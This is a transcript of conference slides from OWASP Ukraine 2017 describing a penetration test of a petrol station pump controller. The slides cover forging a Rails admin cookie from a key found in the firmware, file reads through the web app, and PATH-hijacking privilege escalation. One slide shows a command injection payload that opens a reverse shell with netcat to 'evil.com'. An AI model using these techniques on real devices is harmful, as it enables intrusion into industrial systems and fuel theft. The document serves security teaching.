Yuriy Bilyk "Wanna free petrol? Ask me How"
•Download as PPTX, PDF•
0 likes•416 views
An awesome real-life case about hacking a petrol station by Yuriy Bilyk on OWASP Ukraine 2017 Security Conference https://www.facebook.com/events/914991308665427/
Recommended
Recommended
More Related Content
Recently uploaded
Recently uploaded (20)
Featured
Featured (20)
Yuriy Bilyk "Wanna free petrol? Ask me How"
- 1. Yurii Bilyk | 2017 Wanna free petrol? Ask me How
- 2. WHO AM I # root
- 3. • WE are Penetration Testers • WE are ALL Engineers (Almost;) • WE are OWASP Lviv Chapter • WE are Legio… oops blog: http://owasp-lviv.blogspot.com skype: y.bilyk TEAM
- 4. IoT Short Breef IoT Hacking Hacking Petrol Station Some Other Stuff Agenda
- 6. What is IoT Device? Network Connected Run some code (Firmware, App, etc) Billions of Devices
- 7. IoT Categories Low Power Dumb Devices (Smart Sensors) Low Power Consumption with some logic inside Fully Packed (Linux OS, Large Storage, Fast RAM, GPU, etc)
- 10. IoT Hacking: What Do You Mean? Get access to the device OS (via network, physical ports, etc) Run custom code (upload firmware, compile app, etc) Use as proxy for other attacks
- 11. IoT Hacking: Is It Hard? Tonn of vulnerable devices (hello shodan) Lack of updates for old devices Vendors are very passive in securing devices
- 12. IoT Hacking: Attack Vectors Known vulnerability in the OS, Services, Applications Usual attacks like BoF, SQLi, RCE, etc Hardware Attacks like Side Channel Attacks, CPU Debugging, I/O fuzzing, Firmware mods, etc
- 13. Only For Educational Purpose Remember
- 15. Project Summary Petrol station fuel pump controller Linux, ARM, a lot of I/O ports Ethernet Connection
- 16. Project Summary Secure Boot Loader and Password Protected Console Signed Firmware & App Updates SSH access only by key Ruby Web Application with separate low privileged user
- 18. What We Tried XSS, SQL Injections, CSRF, XXE Ruby on Rails known exploits Modified Firmware Upload Install custom app via update Linux kernel exploits RCE via some sort of package processing
- 19. What We’ve Got
- 20. IoT Try Harder OSCP ©
- 21. Think Outside The Box Devices are similar from the firmware perspective Firmware is available to download Access is possible via Network and Serial Console
- 22. Atack Vectors 2.0 Vulnerabilities in the Boot Loader Vulnerabilities in the Web App
- 23. Step One: Thoughts It’s RoR Application Firmware is exactly the same on all devices with same version RoR Uses Cookie Token
- 24. Step One: Attack Extract firmware image Find RoR secret key Craft session cookie for admin privileges user
- 25. Step Two: Thoughts Web Application Allows to see system version & releases notes System version & release notes stored as files on the files system Sound like a plan
- 26. Step Two: Attack Modify HTTP request to read other files on the file system This vulnerability helped us to hack boot loader later
- 27. Step Three: Thoughts Web App allows to do some system actions like change date, reboot, etc App need some sort of root privileges (for reboot) To run privileged commands you need SUID bit, SUDO, etc
- 28. Step Three: Attack RCE in the date change functionality Web App runs date change shell scripts w/o input validation Shell commands injections finally gives shell with low privileges
- 29. Step Three: Details system("date_change.sh #{arg}")
- 30. Step Three: Details system("date_change.sh 1; nc -e /bin/sh evil.com 1337")
- 31. Step Four: Thoughts With reverse shell we found several bash scripts with sudo no password options It’s time to get ROOOT
- 32. Step Four: Attack Some bash scripts uses relative commands (w/o absolute path) Modification of PATH variables allows to change search order of commands Writing our code into shell script with same name of used command(s)
- 33. Step Four: Details #!/bin/sh cat /etc/hosts PATH=/bin:/usr/bin
- 34. Step Four: Details PATH=/home/user:/bin #!/bin/sh /home/user/cat /etc/hosts /bin/cat /etc/hosts
- 35. Vulnerabilities Summary Crafted session and login w/o password Remote Command Execution Got Root
- 36. And Bonus Oh My GOD!
- 37. Console Password Attack: Info Modified U-Boot code Dynamic console password (different for each device) Static password for failed boot
- 38. Console Password Attack: Actions We reversed boot loader code (original U-boot code really helps) Recovered algorithm for dynamic password (with help of LFI mentioned before) We really didn’t managed to crack static password hash..
- 40. Thank YOU!